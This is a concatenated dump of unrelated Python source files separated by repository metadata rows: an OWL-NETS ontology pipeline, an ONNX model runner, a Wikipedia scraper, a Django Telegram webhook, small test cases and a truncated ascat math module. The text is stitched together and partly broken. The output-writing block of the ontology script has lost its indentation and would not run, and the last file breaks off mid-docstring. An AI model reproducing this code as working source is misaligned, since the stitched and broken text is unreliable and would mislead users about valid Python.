    logger.info(f"Running robot merge on '{uri}'")
    loc = f'.{os.sep}robot'
    robot_jar = 'https://github.com/ontodev/robot/releases/download/v1.8.1/robot.jar'
    robot_sh = 'https://raw.githubusercontent.com/ontodev/robot/master/bin/robot'
    if 'JAVA_HOME' not in os.environ:
        print('The environment variable JAVA_HOME must be set and point to a valid JDK')
        exit(1)
    java_home: str = os.getenv('JAVA_HOME')
    jdk: str = file_from_path(java_home)
    # NOTE(review): the 'jdk-*.jdk' directory naming is macOS-specific; this
    # check will reject valid JDK paths on Linux - confirm intended platforms.
    if not re.match(r'^jdk-.*\.jdk$', jdk):
        print(f'Environment variable JAVA_HOME={java_home} does not appear to point to a valid JDK?')
        exit(1)
    cwd = os.getcwd()
    os.system(f"mkdir -p {loc}")
    os.chdir(loc)
    # Fetch the ROBOT jar and launcher only on first use (cached under ./robot).
    if not os.path.exists(file_from_uri(robot_jar)):
        os.system(f"wget {robot_jar}")
    robot: str = file_from_uri(robot_sh)
    if not os.path.exists(robot):
        os.system(f"wget {robot_sh}")
        os.system(f"chmod +x {robot}")
    owl_file: str = file_from_uri(owl_url)
    if not os.path.exists(owl_file):
        os.system(f"wget {owl_url}")
    # https://robot.obolibrary.org/merge
    os.system(f".{os.sep}robot merge --input .{os.sep}{owl_file} --output .{os.sep}{owl_file}.merge")
    # move back to the working directory
    os.chdir(cwd)
# --- Top-level pipeline: timing, optional robot-merge short-circuit, workspace
# --- preparation, OWL download with MD5 verification, and an imports check.
start_time = time.time()
print(f"Processing '{uri}'")
logger.info(f"Processing '{uri}'")
# This should remove imports if any. Currently it's a one shot deal and exits.
# TODO: In the future the output of this can be fed into the pipeline so that the processing contains no imports.
if args.robot is True:
    robot_merge(uri)
    elapsed_time = time.time() - start_time
    logger.info('Done! Elapsed time %s', "{:0>8}".format(str(timedelta(seconds=elapsed_time))))
    exit(0)
download_owltools(args.owltools_dir)
# Per-ontology working directory, e.g. ./owlnets_output/<name> for <name>.owl.
working_file: str = file_from_uri(uri)
uri_dir: str = working_file.rsplit('.', 1)[0]
working_dir: str = args.owlnets_dir + os.path.sep + uri_dir
logger.info("Make sure working directory '%s' exists", working_dir)
os.system(f"mkdir -p {working_dir}")
if args.clean is True:
    logger.info(f"Deleting files in working directory {working_dir} because of --clean option")
    os.system(f"cd {working_dir}; rm -f *")
working_dir_file_list = os.listdir(working_dir)
if len(working_dir_file_list) == 0:
    logger.info(f"Working directory {working_dir} is empty")
else:
    logger.error(f"Working directory {working_dir} is NOT empty")
# Code below taken from:
# https://github.com/callahantiff/PheKnowLator/blob/master/notebooks/OWLNETS_Example_Application.ipynb
cpus = psutil.cpu_count(logical=True)
logger.info('Loading ontology')
# Parse an XML document from a URL or an InputSource.
# NOTE: Sometimes, with large documents (eg., chebi) the uri parse hangs, so here we download the document first
# Another problem is with chebi, there is a redirect which Graph.parse(uri, ...) may not handle.
# NOTE(review): despite the comment above, parse_loc is still the remote `uri`,
# not the locally downloaded owl_file - the later Graph().parse(parse_loc, ...)
# re-fetches from the network; confirm whether it should point at owl_file.
parse_loc: str = uri
owl_dir: str = args.owl_dir + os.path.sep + uri_dir
owl_file: str = owl_dir + os.path.sep + working_file
# (Re)download when the cached copy's MD5 sidecar is missing/stale, or on demand.
if compare_file_md5(owl_file) is False or args.force_owl_download is True:
    download_owl(uri, owl_dir)
# At this point we have either downloaded the .owl file because the MD5 that we found for it was wrong,
# or we were told to force the download. If the MD5 is wrong at this point, we punt!
if compare_file_md5(owl_file) is False:
    err_msg: str = f"MD5 for OWL file does not match?! Terminating."
    logger.error(err_msg)
    print(err_msg)
    exit(1)
# Abort (unless --with_imports) when the ontology declares owl:imports.
search_owl_file_for_imports(owl_file)
# --- Load the ontology into rdflib, harvest node/relation metadata, then run
# --- the PheKnowLator OWL-NETS transformation on it.
graph = Graph().parse(parse_loc, format='xml')
logger.info('Extract Node Metadata')
ont_classes = pkt.utils.gets_ontology_classes(graph)
ont_labels = {str(x[0]): str(x[2]) for x in list(graph.triples((None, RDFS.label, None)))}
ont_synonyms = pkt.utils.gets_ontology_class_synonyms(graph)
ont_dbxrefs = pkt.utils.gets_ontology_class_dbxrefs(graph)
ont_objects = pkt.utils.gets_object_properties(graph)
logger.info('Add the class metadata to the master metadata dictionary')
entity_metadata = {'nodes': {}, 'relations': {}}
for cls in tqdm(ont_classes):
    # get class metadata - synonyms and dbxrefs
    syns = '|'.join([k for k, v in ont_synonyms[0].items() if v == str(cls)])
    dbxrefs = '|'.join([k for k, v in ont_dbxrefs[0].items() if v == str(cls)])
    # extract metadata
    # Namespace heuristic: OBO-style IRIs (e.g. .../CHEBI_1234) yield the prefix
    # before '_'; otherwise fall back to the IRI's host component.
    if '_' in str(cls):
        namespace = re.findall(r'^(.*?)(?=\W|_)', str(cls).split('/')[-1])[0].upper()
    else:
        namespace = str(cls).split('/')[2]
    # update dict
    entity_metadata['nodes'][str(cls)] = {
        'label': ont_labels[str(cls)] if str(cls) in ont_labels.keys() else 'None',
        'synonyms': syns if syns != '' else 'None',
        'dbxrefs': dbxrefs if dbxrefs != '' else 'None',
        'namespace': namespace
    }
logger.info('Add the object metadata to the master metadata dictionary')
for obj in tqdm(ont_objects):
    # get object label
    label_hits = list(graph.objects(obj, RDFS.label))
    label = str(label_hits[0]) if len(label_hits) > 0 else 'None'
    # get object namespace
    if 'obo' in str(obj) and len(str(obj).split('/')) > 5:
        namespace = str(obj).split('/')[-2].upper()
    else:
        if '_' in str(obj):
            namespace = re.findall(r'^(.*?)(?=\W|_)', str(obj).split('/')[-1])[0].upper()
        else:
            namespace = str(obj).split('/')[2]
    # update dict
    entity_metadata['relations'][str(obj)] = {'label': label, 'namespace': namespace}
logger.info('Add RDF:type and RDFS:subclassOf')
entity_metadata['relations']['http://www.w3.org/2000/01/rdf-schema#subClassOf'] =\
    {'label': 'subClassOf', 'namespace': 'www.w3.org'}
entity_metadata['relations']['https://www.w3.org/1999/02/22-rdf-syntax-ns#type'] =\
    {'label': 'type', 'namespace': 'www.w3.org'}
logger.info('Stats for original graph before running OWL-NETS')
pkt.utils.derives_graph_statistics(graph)
logger.info('Initialize owlnets class')
owlnets = pkt.OwlNets(graph=graph,
                      write_location=working_dir + os.sep,
                      filename=file_from_uri(uri),
                      kg_construct_approach=None,
                      owl_tools=args.owltools_dir + os.sep + 'owltools')
logger.info('Remove disjointness with Axioms')
owlnets.removes_disjoint_with_axioms()
logger.info('Remove triples used only to support semantics')
cleaned_graph = owlnets.removes_edges_with_owl_semantics()
filtered_triple_count = len(owlnets.owl_nets_dict['filtered_triples'])
logger.info('removed {} triples that were not biologically meaningful'.format(filtered_triple_count))
logger.info('Gather list of owl:class and owl:axiom entities')
owl_classes = list(pkt.utils.gets_ontology_classes(owlnets.graph))
owl_axioms: list = []
# Keep an owl:Axiom when both its annotatedSource and annotatedTarget are
# owl:Class instances, or when exactly one is a class and the other is untyped.
for x in tqdm(set(owlnets.graph.subjects(RDF.type, OWL.Axiom))):
    src = set(owlnets.graph.objects(list(owlnets.graph.objects(x, OWL.annotatedSource))[0], RDF.type))
    tgt = set(owlnets.graph.objects(list(owlnets.graph.objects(x, OWL.annotatedTarget))[0], RDF.type))
    if OWL.Class in src and OWL.Class in tgt:
        owl_axioms += [x]
    elif (OWL.Class in src and len(tgt) == 0) or (OWL.Class in tgt and len(src) == 0):
        owl_axioms += [x]
    else:
        pass
node_list = list(set(owl_classes) | set(owl_axioms))
logger.info('There are:\n-{} OWL:Class objects\n-{} OWL:Axiom Objects'. format(len(owl_classes), len(owl_axioms)))
logger.info('Decode owl semantics')
owlnets.cleans_owl_encoded_entities(node_list)
decoded_graph: Dict = owlnets.gets_owlnets_graph()
logger.info('Update graph to get all cleaned edges')
owlnets.graph = cleaned_graph + decoded_graph
logger.info('Owlnets results')
str1 = 'Decoded {} owl-encoded classes and axioms. Note the following:\nPartially processed {} cardinality ' \
'elements\nRemoved {} owl:disjointWith axioms\nIgnored:\n -{} misc classes;\n -{} classes constructed with ' \
'owl:complementOf;\n -{} classes containing negation (e.g. pr#lacks_part, cl#has_not_completed)\n' \
'Filtering removed {} semantic support triples'
stats_str = str1.format(
len(owlnets.owl_nets_dict['decoded_entities'].keys()), len(owlnets.owl_nets_dict['cardinality'].keys()),
len(owlnets.owl_nets_dict['disjointWith']), len(owlnets.owl_nets_dict['misc'].keys()),
len(owlnets.owl_nets_dict['complementOf'].keys()), len(owlnets.owl_nets_dict['negation'].keys()),
len(owlnets.owl_nets_dict['filtered_triples']))
logger.info('=' * 80 + '\n' + stats_str + '\n' + '=' * 80)
# common_ancestor = 'http://purl.obolibrary.org/obo/BFO_0000001'
# owlnets.graph = owlnets.makes_graph_connected(owlnets.graph, common_ancestor)
logger.info(f"Writing owl-nets results files to directory '{working_dir}'")
owlnets.write_location = working_dir
owlnets.write_out_results(owlnets.graph)
edge_list_filename: str = working_dir + os.sep + 'OWLNETS_edgelist.txt'
logger.info(f"Write edge list results to '{edge_list_filename}'")
with open(edge_list_filename, 'w') as out:
out.write('subject' + '\t' + 'predicate' + '\t' + 'object' + '\n')
for row in tqdm(owlnets.graph):
out.write(str(row[0]) + '\t' + str(row[1]) + '\t' + str(row[2]) + '\n')
logger.info('Get all unique nodes in OWL-NETS graph')
nodes = set([x for y in [[str(x[0]), str(x[2])] for x in owlnets.graph] for x in y])
node_metadata_filename: str = working_dir + os.sep + 'OWLNETS_node_metadata.txt'
logger.info(f"Write node metadata results to '{node_metadata_filename}'")
with open(node_metadata_filename, 'w') as out:
out.write('node_id' + '\t' + 'node_namespace' + '\t' + 'node_label' + '\t' + 'node_synonyms' + '\t' + 'node_dbxrefs' + '\n')
for x in tqdm(nodes):
if x in entity_metadata['nodes'].keys():
namespace = entity_metadata['nodes'][x]['namespace']
labels = entity_metadata['nodes'][x]['label']
synonyms = entity_metadata['nodes'][x]['synonyms']
dbxrefs = entity_metadata['nodes'][x]['dbxrefs']
out.write(x + '\t' + namespace + '\t' + labels + '\t' + synonyms + '\t' + dbxrefs + '\n')
logger.info('Get all unique nodes in OWL-NETS graph')
relations = set([str(x[1]) for x in owlnets.graph])
relation_filename: str = working_dir + os.sep + 'OWLNETS_relations.txt'
logger.info(f"Writing relation metadata results to '{relation_filename}'")
with open(relation_filename, 'w') as out:
out.write('relation_id' + '\t' + 'relation_namespace' + '\t' + 'relation_label' + '\n')
for x in tqdm(relations):
if x in entity_metadata['relations']:
if 'namespace' in entity_metadata['relations'][x]:
namespace = entity_metadata['relations'][x]['namespace']
if 'label' in entity_metadata['relations'][x]:
label = entity_metadata['relations'][x]['label']
out.write(x + '\t' + namespace + '\t' + label + '\n')
else:
logger.error(f"entity_metadata['relations'][{x}]['label'] not found in: {entity_metadata['relations'][x]}")
else:
logger.error(f"entity_metadata['relations'][{x}]['namespace'] not found in: {entity_metadata['relations'][x]}")
else:
logger.error(f"entity_metadata['relations'][{x}] not found in: {entity_metadata['relations']}")
log_files_and_sizes(working_dir)
# Add log entry for how long it took to do the processing...
elapsed_time = time.time() - start_time
logger.info('Done! Elapsed time %s', "{:0>8}".format(str(timedelta(seconds=elapsed_time))))
| 41.076233 | 128 | 0.667959 | 133 | 0.00726 | 0 | 0 | 0 | 0 | 0 | 0 | 7,169 | 0.391321 |
a4d78de1db41ad21fc14b47b7c3883106da48d50 | 11,513 | py | Python | utils/RunONNXModel.py | kwu91/onnx-mlir | 0b77ee750de015a2a3212556092ce535bc5d831a | [
"Apache-2.0"
] | 1 | 2021-10-01T02:46:03.000Z | 2021-10-01T02:46:03.000Z | utils/RunONNXModel.py | lipracer/onnx-mlir | ecacba10912457d91cfe66799ae2d4408ed85af7 | [
"Apache-2.0"
] | null | null | null | utils/RunONNXModel.py | lipracer/onnx-mlir | ecacba10912457d91cfe66799ae2d4408ed85af7 | [
"Apache-2.0"
] | null | null | null | import os
import sys
import argparse
import onnx
import time
import subprocess
import numpy as np
import tempfile
from onnx import numpy_helper
from collections import OrderedDict
# Command arguments.
parser = argparse.ArgumentParser()
parser.add_argument('model_path', type=str, help="Path to the ONNX model.")
parser.add_argument('--print_input',
action='store_true',
help="Print out inputs")
parser.add_argument('--print_output',
action='store_true',
help="Print out outputs")
parser.add_argument('--compile_args',
type=str,
default="",
help="Arguments passed directly to onnx-mlir command."
" See bin/onnx-mlir --help")
parser.add_argument(
'--shape_info',
type=str,
help="Shape for each dynamic input, e.g. 0:1x10x20,1:7x5x3")
parser.add_argument('--verify',
choices=['onnxruntime', 'ref'],
help="Verify the output by using onnxruntime or reference"
" inputs/outputs. By default, no verification")
parser.add_argument(
'--ref_folder',
type=str,
help="Path to the folder containing reference inputs and outputs stored"
" in protobuf. Used when --verify=ref")
parser.add_argument('--rtol',
type=str,
default="0.05",
help="Relative tolerance for verification")
parser.add_argument('--atol',
type=str,
default="0.01",
help="Absolute tolerance for verification")
args = parser.parse_args()
if (not os.environ.get('ONNX_MLIR_HOME', None)):
raise RuntimeError(
"Environment variable ONNX_MLIR_HOME is not set, please set it to the path to "
"the HOME directory for onnx-mlir. The HOME directory for onnx-mlir refers to "
"the parent folder containing the bin, lib, etc sub-folders in which ONNX-MLIR "
"executables and libraries can be found.")
VERBOSE = os.environ.get('VERBOSE', False)
ONNX_MLIR_EXENAME = "onnx-mlir"
if sys.platform == "win32":
ONNX_MLIR_EXENAME = "onnx-mlir.exe"
ONNX_MLIR = os.path.join(os.environ['ONNX_MLIR_HOME'], "bin",
ONNX_MLIR_EXENAME)
# Include runtime directory in python paths, so PyRuntime can be imported.
RUNTIME_DIR = os.path.join(os.environ['ONNX_MLIR_HOME'], "lib")
sys.path.append(RUNTIME_DIR)
try:
from PyRuntime import ExecutionSession
except ImportError:
raise ImportError(
"Looks like you did not build the PyRuntime target, build it by running `make PyRuntime`."
)
def ordinal(n):
suffix = ['th', 'st', 'nd', 'rd', 'th'][min(n % 10, 4)]
if 11 <= (n % 100) <= 13:
suffix = 'th'
return str(n) + suffix
def execute_commands(cmds):
if (VERBOSE):
print(cmds)
subprocess.call(cmds, shell=True)
def extend_model_output(model, intermediate_outputs):
# onnx-mlir doesn't care about manually specified output types & shapes.
DUMMY_TENSOR_TYPE = onnx.TensorProto.FLOAT
while (len(model.graph.output)):
model.graph.output.pop()
for output_name in intermediate_outputs:
output_value_info = onnx.helper.make_tensor_value_info(
output_name, DUMMY_TENSOR_TYPE, None)
model.graph.output.extend([output_value_info])
return model
def read_input_from_refs(model, ref_folder):
print("Reading inputs from {} ...".format(ref_folder))
i = 0
inputs = []
input_names = []
initializers = list(map(lambda x: x.name, model.graph.initializer))
for input_proto in model.graph.input:
if input_proto.name not in initializers:
input_names.append(input_proto.name)
input_file = ref_folder + '/input_{}.pb'.format(i)
input_ts = onnx.TensorProto()
with open(input_file, 'rb') as f:
input_ts.ParseFromString(f.read())
inputs += [numpy_helper.to_array(input_ts)]
i += 1
print(" done.\n")
return (inputs, input_names)
def read_output_from_refs(model, ref_folder):
print("Reading reference outputs from {} ...".format(ref_folder))
reference_output = []
for i, _ in enumerate(model.graph.output):
output_file = ref_folder + '/output_{}.pb'.format(i)
output_ts = onnx.TensorProto()
with open(output_file, 'rb') as f:
output_ts.ParseFromString(f.read())
reference_output += [numpy_helper.to_array(output_ts)]
print(" done.\n")
return reference_output
def generate_random_input(model, input_shapes):
print("Generating random inputs ...")
# Generate random data as input.
inputs = []
input_names = []
initializers = list(map(lambda x: x.name, model.graph.initializer))
np.random.seed(42)
for i, input_proto in enumerate(model.graph.input):
if input_proto.name in initializers:
continue
input_names.append(input_proto.name)
shape_proto = input_proto.type.tensor_type.shape
explicit_shape = []
for d, dim in enumerate(shape_proto.dim):
if dim.dim_value:
explicit_shape.append(dim.dim_value)
continue
if i in input_shapes:
if d < len(input_shapes[i]):
explicit_shape.append(input_shapes[i][d])
else:
print("The {} dim".format(ordinal(d + 1)),
"of the {} input is unknown.".format(ordinal(i + 1)),
"Use --shape_info to set.")
print(shape_proto)
exit()
else:
print("The shape of the {} input".format(ordinal(i + 1)),
"is unknown. Use --shape_info to set.")
print(shape_proto)
exit()
inputs.append(
np.random.uniform(-1.0, 1.0, explicit_shape).astype(np.float32))
print(" done.\n")
return (inputs, input_names)
def main():
# Get shape information if given.
# args.shape_info in the form of 'input_index:d1xd2, input_index:d1xd2'
input_shapes = {}
if args.shape_info:
for input_shape in args.shape_info.strip().split(","):
input_index_shape = input_shape.split(":")
input_index = input_index_shape[0]
assert not (input_index in input_shapes), "Duplicate input indices"
dims = [int(d) for d in input_index_shape[1].split("x")]
input_shapes[int(input_index)] = dims
# Load the onnx model.
model = onnx.load(args.model_path)
# Get the output names that we want to verify.
# If using onnxruntime for verification, we can verify every operation output.
output_names = [o.name for o in model.graph.output]
output_names = list(OrderedDict.fromkeys(output_names))
if (args.verify and args.verify == "onnxruntime"):
output_names = sum([[n for n in node.output if n != '']
for node in model.graph.node], [])
output_names = list(OrderedDict.fromkeys(output_names))
model = extend_model_output(model, output_names)
# Compile, run, and verify.
with tempfile.TemporaryDirectory() as temp_dir:
print("Temporary directory has been created at {}".format(temp_dir))
print("Compiling the model ...")
# Save modified model & invoke onnx-mlir to compile it.
temp_model_path = os.path.join(temp_dir, "model.onnx")
onnx.save(model, temp_model_path)
command_str = ONNX_MLIR
if args.compile_args:
command_str += " " + args.compile_args
command_str += " " + temp_model_path
start = time.perf_counter()
execute_commands(command_str)
end = time.perf_counter()
print(" took ", end - start, " seconds.\n")
# Prepare input data.
inputs = []
input_names = []
if (args.verify and args.verify.lower() == "ref"):
assert args.ref_folder, "No reference folder given"
inputs, input_names = read_input_from_refs(model, args.ref_folder)
else:
inputs, input_names = generate_random_input(model, input_shapes)
# Print the input if required.
if (args.print_input):
for i, inp in enumerate(inputs):
print("The {} input {}:{} is: \n {} \n".format(
ordinal(i + 1), input_names[i], list(inp.shape), inp))
print("Running inference ...")
temp_shared_lib_path = os.path.join(temp_dir, "model.so")
start = time.perf_counter()
# Use the generated shared library to create an execution session.
sess = ExecutionSession(temp_shared_lib_path, "run_main_graph")
outs = sess.run(inputs)
end = time.perf_counter()
print(" took ", end - start, " seconds.\n")
# Print the output if required.
if (args.print_output):
for i, out in enumerate(outs):
print("The {} output {}:{} is: \n {} \n".format(
ordinal(i + 1), output_names[i], list(out.shape), out))
# Run the model with reference backend and get results.
if (args.verify):
ref_outs = []
if (args.verify.lower() == "onnxruntime"):
# Reference backend by using onnxruntime.
import onnxruntime
output_names = list(map(lambda x: x.name, model.graph.output))
input_feed = dict(zip(input_names, inputs))
print("Running inference using onnxruntime ...")
start = time.perf_counter()
ref_session = onnxruntime.InferenceSession(temp_model_path)
ref_outs = ref_session.run(output_names, input_feed)
end = time.perf_counter()
print(" took ", end - start, " seconds.\n")
elif (args.verify.lower() == "ref"):
ref_outs = read_output_from_refs(model, args.ref_folder)
else:
print("Invalid verify option")
exit()
# For each output tensor, compare results.
for i, name in enumerate(output_names):
print("Verifying value of {}:{}".format(name, list(outs[i].shape)),
"using atol={}, rtol={} ...".format(args.atol, args.rtol))
total_elements = 0
mismatched_elements = 0
for index, actual_val in np.ndenumerate(outs[i]):
total_elements += 1
ref_val = ref_outs[i][index]
# Use equation atol + rtol * abs(desired), that is used in assert_allclose.
diff = float(args.atol) + float(args.rtol) * abs(ref_val)
if (abs(actual_val - ref_val) <= diff):
continue
mismatched_elements += 1
print(" at {}".format(index),
"mismatch {} (actual)".format(actual_val),
"vs {} (reference)".format(ref_val))
if mismatched_elements == 0:
print(" correct.\n".format(
args.atol, args.rtol))
else:
print(" mismatched elements {}/{}.\n".format(
mismatched_elements, total_elements))
if __name__ == '__main__':
main()
| 39.428082 | 98 | 0.588118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,914 | 0.253105 |
a4d7f579f4f81770778c2fff64640120abcdce53 | 262 | py | Python | test/run/t242.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | test/run/t242.py | csev/skulpt | 9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | test/run/t242.py | csev/skulpt | 9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | class O(object): pass
class A(O): pass
class B(O): pass
class C(O): pass
class D(O): pass
class E(O): pass
class K1(A,B,C): pass
class K2(D,B,E): pass
class K3(D,A): pass
class Z(K1,K2,K3): pass
print K1.__mro__
print K2.__mro__
print K3.__mro__
print Z.__mro__
| 17.466667 | 23 | 0.698473 | 185 | 0.706107 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
a4d8df51b3654641073f7de35aaf60a1014ee347 | 3,154 | py | Python | bot/assets/wiki/wiki.py | AdvaithGS/Astrobot | 6b63f8cd015a24d8211dcbac496bf9f5dd6275d4 | [
"MIT"
] | 2 | 2021-12-04T14:27:04.000Z | 2021-12-22T08:52:41.000Z | bot/assets/wiki/wiki.py | AdvaithGS/Astrobot | 6b63f8cd015a24d8211dcbac496bf9f5dd6275d4 | [
"MIT"
] | null | null | null | bot/assets/wiki/wiki.py | AdvaithGS/Astrobot | 6b63f8cd015a24d8211dcbac496bf9f5dd6275d4 | [
"MIT"
] | null | null | null | import requests
from json import loads
from bs4 import BeautifulSoup
from os import environ
l = ['atom','moon','star','space','astro','cluster','galaxy','sky','planet','solar','science','physic','scientist','cosmos']
def clean(text):
while '[' in text:
text = text.replace(text[text.find('['):text.find(']',text.find('['))+1],'')
return text
def get_wiki(search_query):
if len(search_query.split()) == 1:
search_query = search_query.capitalize()
not_space = False
try:
headers = {
'Authorization': environ['api_key5'],
'User-Agent': 'Advaith'
}
page = f'https://en.wikipedia.org/w/rest.php/v1/page/{search_query}/html'
req = requests.get(page).text
soup = BeautifulSoup(req,'lxml')
d = {}
try:
if 'refer' in soup.find_all('p')[1].text:
x = d['13']
text = soup.find_all('p')[0].text
i = 1
while len(text) < 100:
text = soup.find_all('p')[i].text
i += 1
if any([z in text.lower() for z in l]):
text = clean(text)
correct = True
else:
not_space = True
correct = False
except:
for i in soup.find_all('a'):
if any([z in i.text.lower() for z in l]):
try:
search_query = i['href'][1:]
page = 'https://en.wikipedia.org/w/rest.php/v1/page' + i['href'] [1:] + '/html'
req = requests.get(page).text
soup = BeautifulSoup(req,'lxml')
i = 1
text = soup.find_all('p')[0].text
while len(text) < 100:
text = soup.find_all('p')[i].text
i += 1
text = clean(text)
correct = True
break
except:
continue
else:
correct = False
if correct:
url = 'https://api.wikimedia.org/core/v1/wikipedia/en/search/page'
parameters = {'q': search_query, 'limit': 1}
response = loads(requests.get(url, headers=headers, params=parameters).text)
image = 'https:' + response['pages'][0]['thumbnail']['url'].replace('200px','500px')
try:
desc = clean(soup.find('div', attrs = {'class':'infobox-caption'}).text)
except:
try:
desc = clean(soup.find('figcaption').text)
except:
desc = search_query
else:
image = None
except Exception as e:
print(e)
try:
return text,image,desc
except:
if not_space:
return None,None,'is not a space query'
else:
return None,None,'could not be resolved'
# return None,None,'Not found'
#return get_wiki(search_query + ' (moon)')
| 33.553191 | 124 | 0.460051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 612 | 0.194039 |
a4d9167372fd4f933a82a1fee41baeab560eb279 | 1,012 | py | Python | bfassist/standalone/monitoring/realtimecheckpoint.py | SanHime/bfassist | f4870189a54373487064897ad0d5bf46ae9d97f8 | [
"Apache-2.0"
] | 1 | 2021-07-09T14:40:14.000Z | 2021-07-09T14:40:14.000Z | bfassist/standalone/monitoring/realtimecheckpoint.py | SanHime/bfassist | f4870189a54373487064897ad0d5bf46ae9d97f8 | [
"Apache-2.0"
] | null | null | null | bfassist/standalone/monitoring/realtimecheckpoint.py | SanHime/bfassist | f4870189a54373487064897ad0d5bf46ae9d97f8 | [
"Apache-2.0"
] | null | null | null | #############################################################################
#
#
# Module of BFA that manages server statistics in realtime
#
#
#############################################################################
""" This module implements the real-time logging of in-game statistics specifically for one current bf checkpoint.
Dependencies:
None
note:: Author(s): Mitch last-check: 08.07.2021 """
# noinspection PyUnusedLocal
def __preload__(forClient: bool = True):
pass
# noinspection PyUnusedLocal
def __postload__(forClient: bool = True):
pass
class RealTimeCP:
""" A control point that exists on a map can have a corresponding real time control point to track it.
:param Id: Refractor id of this control point.
:param team: Team the control point is currently controlled by.
note:: Author(s): Mitch, henk """
def __init__(self, Id: int = None, team: int = None):
self.Id = Id
self.team = team
| 26.631579 | 114 | 0.560277 | 414 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 767 | 0.757905 |
a4d968f989a285cf96c27baed01da6b65175ba59 | 615 | py | Python | core/views.py | koshasrepus/app_my_place | 8be9e9062247c177375162b943fb842752807553 | [
"Unlicense"
] | null | null | null | core/views.py | koshasrepus/app_my_place | 8be9e9062247c177375162b943fb842752807553 | [
"Unlicense"
] | null | null | null | core/views.py | koshasrepus/app_my_place | 8be9e9062247c177375162b943fb842752807553 | [
"Unlicense"
] | null | null | null | from django.shortcuts import render
from django.http import JsonResponse
from django.views import View
from core.handlers.dispatcher import process_telegram_event
from app_my_places.settings import TELEGRAM_TOKEN
import json
# Create your views here.
def index(request):
return JsonResponse({"error": "forbidden"})
class TelegramBotWebhookView(View):
def post(self, request, *args, **kwargs):
process_telegram_event(json.loads(request.body))
return JsonResponse({"post": "work!"})
def get(self, request, *args, **kwargs):
return JsonResponse({"ok": "Get response work!"})
| 26.73913 | 59 | 0.734959 | 290 | 0.471545 | 0 | 0 | 0 | 0 | 0 | 0 | 80 | 0.130081 |
a4d975ef883007f74d9af2353db4314fdedd350c | 157 | py | Python | tests/cases/infer.py | div72/py2many | 60277bc13597bd32d078b88a7390715568115fc6 | [
"MIT"
] | 345 | 2021-01-28T17:33:08.000Z | 2022-03-25T16:07:56.000Z | tests/cases/infer.py | mkos11/py2many | be6cfaad5af32c43eb24f182cb20ad63b979d4ef | [
"MIT"
] | 291 | 2021-01-31T13:15:06.000Z | 2022-03-23T21:28:49.000Z | tests/cases/infer.py | mkos11/py2many | be6cfaad5af32c43eb24f182cb20ad63b979d4ef | [
"MIT"
] | 23 | 2021-02-09T17:15:03.000Z | 2022-02-03T05:57:44.000Z | #!/usr/bin/env python3
def foo():
a = 10
# infer that b is an int
b = a
assert b == 10
print(b)
if __name__ == "__main__":
foo()
| 11.214286 | 28 | 0.509554 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 56 | 0.356688 |
a4d9e356367e346a01ca362683e21a1ac2b3a8aa | 4,852 | py | Python | src/ascat/math.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | src/ascat/math.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | src/ascat/math.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | # Copyright (c) 2020, TU Wien, Department of Geodesy and Geoinformation
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of TU Wien, Department of Geodesy and Geoinformation
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL TU WIEN DEPARTMENT OF GEODESY AND
# GEOINFORMATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
def db2lin(val):
"""
Converting from linear to dB domain.
Parameters
----------
val : numpy.ndarray
Values in dB domain.
Returns
-------
val : numpy.ndarray
Values in linear domain.
"""
return 10 ** (val / 10.)
def lin2db(val):
"""
Converting from linear to dB domain.
Parameters
----------
val : numpy.ndarray
Values in linear domain.
Returns
-------
val : numpy.ndarray
Values in dB domain.
"""
return 10. * np.log10(val)
def get_window_radius(window, hp_radius):
"""
Calculates the required radius of a window function in order to achieve
the provided half power radius.
Parameters
----------
window : string
Window function name.
Current supported windows:
- Hamming
- Boxcar
hp_radius : float32
Half power radius. Radius of window function for weight
equal to 0.5 (-3 dB). In the spatial domain this corresponds to
half of the spatial resolution one would like to achieve with the
given window.
Returns
-------
r : float32
Window radius needed to achieve the given half power radius
"""
window = window.lower()
hp_weight = 0.5
if window == 'hamming':
alpha = 0.54
r = (np.pi * hp_radius) / np.arccos((hp_weight-alpha) / (1-alpha))
elif window == 'boxcar':
r = hp_radius
else:
raise ValueError('Window name not supported.')
return r
def hamming_window(radius, distances):
"""
